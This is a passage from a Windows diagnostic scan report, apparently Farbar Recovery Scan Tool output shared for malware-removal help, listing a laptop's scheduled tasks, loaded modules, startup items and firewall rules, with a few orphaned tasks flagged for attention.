CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1082\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 -> C:\Program Files\WinZip\adxloader64.dll ()
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\FileSyncApi64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
 
==================== Restore Points =========================
 
06-06-2015 14:10:34 Installed Microsoft AppLocale
06-06-2015 19:39:44 Removed piaip AppLocale
06-06-2015 20:12:19 Installed Adblock Plus for IE (32-bit and 64-bit)
08-06-2015 03:00:11 Windows Update
08-06-2015 03:58:59 Removed Itibiti RTC
08-06-2015 04:06:03 Norton_Power_Eraser_20150608040602812
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-03-04 14:00 - 2015-06-05 15:28 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0661E8E9-8E0B-4CEC-B9FD-A22C9C623A4D} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {0A31A79E-2917-48A2-9B70-B5FC12E49153} - \avabvbxvh No Task File <==== ATTENTION
Task: {0CA834EB-1EA8-4427-993A-E7462477282A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-02-20] (Google Inc.)
Task: {132761ED-7820-4A56-95A5-BDA0D61AB314} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {163610C3-9715-40F2-8BEF-6EBE417C4AF9} - System32\Tasks\{0A48383E-28B8-4E3F-9733-DE0573B61731} => Chrome.exe 
Task: {176A12CA-0E00-48F8-996E-4F5457FB4C20} - \EssentialUpdateMachine No Task File <==== ATTENTION
Task: {1B685D25-D209-469B-936D-BEB2A90FF97C} - System32\Tasks\Norton Security Suite\Norton Error Analyzer => C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {1D9C375E-6506-4201-A792-7B6DA6D6BD9C} - System32\Tasks\{B48A0F62-6243-49C7-AE7F-8C6427269335} => pcalua.exe -a "C:\Users\dell 2\Downloads\XP32_14.51.10_5436_setup_ZPE (1).exe" -d "C:\Users\dell 2\Downloads"
Task: {27EF400E-E167-4D38-94BB-E4490C6BD2A7} - System32\Tasks\Microsoft\Windows\Setup\gwx\launchtrayprocess => C:\Windows\system32\GWX\GWX.exe [2015-05-07] (Microsoft Corporation)
Task: {43BCD539-61CF-4368-9094-0D2865404360} - No Task path
Task: {4A490EC1-238F-45B5-B905-716D5A8C6F18} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {55006978-49FE-4621-BB29-F37A35FE547B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-02-20] (Google Inc.)
Task: {5801D1ED-85D8-4EBE-BEDD-1B08C604978D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1000UA => C:\Users\Moncef Maiza\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {60844B36-A841-49A9-98B0-1F20F87E6CD3} - System32\Tasks\SidebarExecute => C:\Program Files\Windows Sidebar\sidebar.exe [2010-11-20] (Microsoft Corporation)
Task: {79F4F321-31B3-4842-B7E2-ECACC6925A32} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-06-06] (Adobe Systems Incorporated)
Task: {7CDBA3B1-E3FF-4EB3-84A1-52E8AF8CEF1F} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1000Core => C:\Users\Moncef Maiza\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {815C1EC7-46EE-47F2-9CF4-B13611663B29} - System32\Tasks\AdobeAAMUpdater-1.0-Seville-dell 2 => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2013-01-24] (Adobe Systems Incorporated)
Task: {87537A66-F602-4AD7-9DC7-9C5D858336D0} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006Core => C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {89A119DE-451C-4C06-8801-58EA2087FC5E} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2015-05-22] (Microsoft Corporation)
Task: {8BE8AB5D-0A62-44C1-AD56-621282D55F1F} - System32\Tasks\AdobeAAMUpdater-1.0-Seville-Moncef Maiza => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2013-01-24] (Adobe Systems Incorporated)
Task: {93B0B801-B55C-4979-849A-CE0BD7403DB7} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\WSCStub.exe [2015-03-07] (Symantec Corporation)
Task: {9B22D30B-5691-4663-B888-A3DE786DD255} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006UA => C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {A399D42A-8F22-47C4-8410-730F5C753DD2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {AAACCC16-E7AD-4810-BC6B-C973C1249D91} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => C:\Windows\system32\compattel\DiagTrackRunner.exe [2015-03-16] (Microsoft Corporation)
Task: {B560DEF3-E1DF-423C-9599-C7829897E5B7} - System32\Tasks\Microsoft\Windows\Windows Activation Technologies\ValidationTask => C:\Windows\system32\Wat\WatAdminSvc.exe [2011-08-12] (Microsoft Corporation)
Task: {B614EC99-F5CB-4E6A-8400-E117B8E0CB54} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation)
Task: {BF1DAF5A-B951-4D4A-831F-9593CBE2657A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation)
Task: {C59F9A76-7C94-4308-BAE8-DEF88DA3EA30} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
Task: {C89ED18D-F827-4148-95B5-0A8F9102D4A5} - System32\Tasks\Norton Security Suite\Norton Error Processor => C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {CB1DCA5A-6E2E-4B22-A3B9-3C8255632BAD} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-05-07] (Microsoft Corporation)
Task: {D7701A85-7F86-4B4C-9803-0FF2E2CB2B6E} - \Winupdate No Task File <==== ATTENTION
Task: {DA7DE32F-CA49-4F18-BB63-C491B014AEEE} - System32\Tasks\FRAPS
Task: {DD7D4617-3404-4AC3-B62E-2082883DD5BC} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {E8A5BA45-3FF7-44BB-B26A-B495BCDF0D7D} - System32\Tasks\{1C5A80C1-DE1F-471B-9B8D-629A5AC691AF} => pcalua.exe -a "C:\Users\dell 2\Downloads\XP32_14.51.10_5436_setup_ZPE.exe" -d "C:\Users\dell 2\Downloads"
Task: {EB7EB52E-D4D6-4C30-97A7-0AF79BC07CAA} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1000Core.job => C:\Users\Moncef Maiza\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1000UA.job => C:\Users\Moncef Maiza\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006Core.job => C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006UA.job => C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Software Removal Tool logs upload retry.job => C:\Users\dell 2\Downloads\software_removal_tool.exe
Task: C:\Windows\Tasks\Tweaking.com - Windows Repair Tray Icon.job => C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)Tweaking.com - Windows Repair)Created By Tweaking.com
 
==================== Loaded Modules (Whitelisted) ==============
 
2010-12-23 14:33 - 2010-12-23 14:33 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2014-03-15 15:18 - 2014-05-20 09:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2014-05-13 07:22 - 2003-04-18 18:06 - 00008192 _____ () c:\Windows\SysWOW64\srvany.exe
2015-03-19 20:25 - 2015-01-27 11:29 - 08898720 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2010-01-02 10:42 - 2010-01-02 10:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2011-06-15 09:51 - 2011-03-28 13:55 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-06-09 02:36 - 2012-06-09 02:36 - 01229464 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2012-11-29 17:59 - 2012-11-29 17:59 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-02-10 18:34 - 2015-04-16 13:40 - 00776192 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-01-20 22:07 - 2015-04-22 22:16 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-01-20 22:07 - 2015-04-22 22:16 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-01-20 22:07 - 2015-04-22 22:16 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2014-05-24 10:46 - 2015-06-04 14:56 - 02407104 _____ () C:\Program Files (x86)\Steam\video.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 02396672 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 00479744 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2014-02-25 13:57 - 2015-06-04 14:56 - 00703168 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2015-06-05 00:20 - 2015-06-05 00:20 - 26065408 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\libcef.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00739840 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\libGLESv2.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00909312 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\platforms\qwindows.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00130048 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\libEGL.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00020992 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qgif.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00021504 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qico.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00205312 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qjpeg.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00225792 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qmng.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00015872 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qsvg.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00312832 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qtiff.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00010240 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\qml\QtQuick.2\qtquick2plugin.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00054272 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\qml\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00010240 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\qml\QtQml\Models.2\modelsplugin.dll
2015-06-06 19:55 - 2015-06-06 19:55 - 16863920 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll
2014-01-10 15:33 - 2015-05-11 15:01 - 36302728 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2015-06-07 03:53 - 2015-05-22 16:22 - 01281864 _____ () C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.81\libglesv2.dll
2015-06-07 03:53 - 2015-05-22 16:22 - 00080712 _____ () C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.81\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MSIServer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "DisplayName"="HandsFree Client"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "ErrorControl"="1"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "ImagePath"="C:\Program Files (x86)\HandsFree\Client\srvc.exe"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "ObjectName"="LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "Start"="2"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "Type"="272"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client\Parameters => "Application"="C:\Program Files (x86)\HandsFree\Client\srvc.exe"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client\Parameters => "AppParameters"=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\dell.com -> dell.com
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\Control Panel\Desktop\\Wallpaper -> C:\Users\dell 2\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 209.18.47.61 - 209.18.47.62
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Dell System Manager.lnk => C:\Windows\pss\Dell System Manager.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Digital Line Detect.lnk => C:\Windows\pss\Digital Line Detect.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^FAH.lnk => C:\Windows\pss\FAH.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^WinZip Preloader.lnk => C:\Windows\pss\WinZip Preloader.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^dell 2^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OpenOffice.org 3.3.lnk => C:\Windows\pss\OpenOffice.org 3.3.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: Apoint => C:\Program Files\DellTPad\Apoint.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\dell 2\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: DBRMTray => C:\Dell\DBRM\Reminder\DbrmTrayIcon.exe
MSCONFIG\startupreg: Dell Webcam Central => "C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe" /mode2
MSCONFIG\startupreg: Desktop Disc Tool => "C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe"
MSCONFIG\startupreg: FreeFallProtection => C:\Program Files (x86)\STMicroelectronics\AccelerometerP11\FF_Protection.exe
MSCONFIG\startupreg: Google Update => "C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: GoogleDriveSync => "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
MSCONFIG\startupreg: IntelPROSet => "C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" /tf Intel PROSet/Wireless
MSCONFIG\startupreg: PDVD9LanguageShortcut => "C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RemoteControl9 => "C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe"
MSCONFIG\startupreg: RoxWatchTray => "C:\Program Files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
MSCONFIG\startupreg: SysTrayApp => C:\Program Files\IDT\WDM\sttray64.exe
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [{2A1A83FD-1AA7-43B2-851C-16C3E2443A02}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD9\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{1C290216-96D1-4181-898E-2DBD85BDC365}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD9\PowerDVD9.EXE
FirewallRules: [{1036D150-A554-4702-BFF6-7925CC67799A}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{D4EB9F7D-8DAA-4480-903C-D214601B7290}] => (Allow) LPort=2869
FirewallRules: [{254C43CB-BDD5-4EDB-B305-7622FB7F9816}] => (Allow) LPort=1900
FirewallRules: [{51FC7B6B-F90F-4AE8-ABB5-6164787F403F}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{42C88828-00AC-4FAD-BAAB-31BDD4237771}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{F4CAD8F4-596C-4522-8E1E-95096BE9D8D2}] => (Allow) LPort=61116
FirewallRules: [{C2321305-09B7-4725-A2AF-0E7D9CBD8726}] => (Allow) LPort=21112
FirewallRules: [{0D2253CB-C466-4D55-AF0F-53AB2FE15C42}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{23A99D00-5A19-4C2E-B644-8D1333FD0270}C:\program files (x86)\pidgin\pidgin.exe] => (Allow) C:\program files (x86)\pidgin\pidgin.exe
FirewallRules: [UDP Query User{D42BC224-B336-4890-B663-7F0DF9DC8CEC}C:\program files (x86)\pidgin\pidgin.exe] => (Allow) C:\program files (x86)\pidgin\pidgin.exe
FirewallRules: [{415DE125-0901-4DAD-BAD7-E404D94E034A}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [TCP Query User{6C35A36A-FB7D-4D8D-9684-9342FDF5EF7D}C:\program files (x86)\premiumsoft\navicat lite\navicat.exe] => (Allow) C:\program files (x86)\premiumsoft\navicat lite\navicat.exe
FirewallRules: [UDP Query User{26FEF1AD-B07D-4907-8A40-F0A1005BAA7E}C:\program files (x86)\premiumsoft\navicat lite\navicat.exe] => (Allow) C:\program files (x86)\premiumsoft\navicat lite\navicat.exe
FirewallRules: [{359979AA-2130-4590-A9A9-857917AA1134}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{3D18FE95-6F62-4BBB-A61D-493135890990}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [TCP Query User{CE9CEA05-2FEF-49CA-BAA5-2B1F8379024D}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [UDP Query User{87524CD2-7D39-40D2-A190-D0B4049E52CC}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [{CEB2893C-1394-4CCA-9E30-0F4BD9CA9399}] => (Allow) LPort=61117
FirewallRules: [{8D0DE2F9-8F67-4834-A345-5D613D40C7DC}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cust.exe
FirewallRules: [{574FEC6A-C2BD-4CB2-B413-67B7737E29E0}] => (Allow) C:\Program Files (x86)\HandsFree\Client\capp.exe
FirewallRules: [{31C323B7-73A7-4E39-8C85-400F1915821F}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cutil.exe
FirewallRules: [{EB7FE9F8-3F44-46F9-ACF7-EE1DA4D5ADAB}] => (Allow) C:\Program Files (x86)\HandsFree\Client\rerun.exe
FirewallRules: [{E62D432D-ECC4-4D15-9C26-938ABD27D760}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srvc.exe
FirewallRules: [{9D595EDF-D6A1-4098-8784-4DD3DF70EA17}] => (Allow) C:\Program Files (x86)\HandsFree\Client\srtct.exe
